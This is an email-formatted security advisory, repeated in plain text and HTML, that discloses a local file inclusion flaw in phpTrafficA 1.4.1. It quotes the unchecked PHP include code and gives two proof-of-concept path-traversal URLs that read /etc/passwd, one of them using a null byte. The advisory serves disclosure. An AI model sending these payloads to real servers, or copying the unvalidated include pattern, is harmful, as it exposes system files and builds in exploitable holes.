phptraffic-lfi.txt

`------=_Part_16228_26164291.1172086007407  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
phpTrafficA-1.4.1 Local File Inclusion  
  
phpTrafficA is a GPL statistical tool for web traffic analysis, written in  
php and mySQL.  
It can track access counts to your website, search engines, keywords, and  
referrers that lead to you, operating systems, web browsers, visitor  
retention, path analysis, and a lot more!  
  
http://soft.zoneo.net/phpTrafficA/  
  
  
Credit:  
The information has been provided by Hamid Ebadi  
The original article can be found at : http://www.bugtraq.ir  
  
Vulnerable Systems:  
Version: phpTrafficA-1.4.1  
phpTrafficA-1.4beta4  
(also tested on phpTrafficA-1.3)  
  
Description:  
Input passed to the "file" parameter in "plotStat.php" and "lang" parameter  
in "banref.php" is not properly verified, before it is used to include  
files.  
This can be exploited to include/see arbitrary files from local resources.  
  
  
read more about file inclusion in http://www.bugtraq.ir/articles  
  
Vulnerable Code :  
//phpTrafficA/plotStat.php  
//Vulnerable Code :line 14  
if (!isset($file) or $file=="") {$file = $_GET['file'];}  
include("./Php/phplot.php");  
include("./tmp/".$file);  
  
  
  
//phpTrafficA/plotStat.php  
//Vulnerable Code :line 16  
if (!isset($lang) or $lang == "") {  
$lang = $_GET["lang"];  
if ($lang == "") { $lang = $_POST["lang"];}  
}  
include ("./Lang/$lang.php");  
  
  
POC exploit :  
The following URL will cause local file inclusion  
  
http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd  
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00  
  
# http://www.bugtraq.ir  
  
------=_Part_16228_26164291.1172086007407  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
phpTrafficA-1.4.1&nbsp; Local File Inclusion<br><br>phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL.<br>It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more!  
<br><br><a href="http://soft.zoneo.net/phpTrafficA/">http://soft.zoneo.net/phpTrafficA/</a><br><br><br>Credit:<br>The information has been provided by Hamid Ebadi<br>The original article can be found at : <a href="http://www.bugtraq.ir">  
http://www.bugtraq.ir</a><br><br>Vulnerable Systems:<br>Version: phpTrafficA-1.4.1<br>&nbsp;&nbsp; &nbsp; phpTrafficA-1.4beta4 <br>&nbsp;&nbsp; &nbsp; (also tested on phpTrafficA-1.3)<br><br>Description:<br>Input passed to the "file" parameter in "  
plotStat.php"&nbsp; and "lang" parameter in "banref.php" is not&nbsp; properly verified, before it is used to include files.<br>This can be exploited to include/see arbitrary files from local resources.<br>  
<br><br>read more about file inclusion in <a href="http://www.bugtraq.ir/articles">http://www.bugtraq.ir/articles</a><br><br>Vulnerable Code :<br>//phpTrafficA/plotStat.php<br>//Vulnerable Code :line 14<br>if (!isset($file) or $file=="") {$file = $_GET['file'];}  
<br>include("./Php/phplot.php");<br>include("./tmp/".$file);<br><br><br><br>//phpTrafficA/plotStat.php<br>//Vulnerable Code :line 16<br>if (!isset($lang) or $lang == "") {<br>&nbsp;&nbsp; &nbsp;$lang = $_GET["lang"];  
<br>&nbsp;&nbsp; &nbsp;if ($lang == "") { $lang = $_POST["lang"];}<br>}<br>include ("./Lang/$lang.php");<br><br><br>POC exploit :<br>The following URL will cause local file inclusion<br><br>http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd  
<br>http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00<br><br># <a href="http://www.bugtraq.ir">http://www.bugtraq.ir</a>  
  
------=_Part_16228_26164291.1172086007407--  
`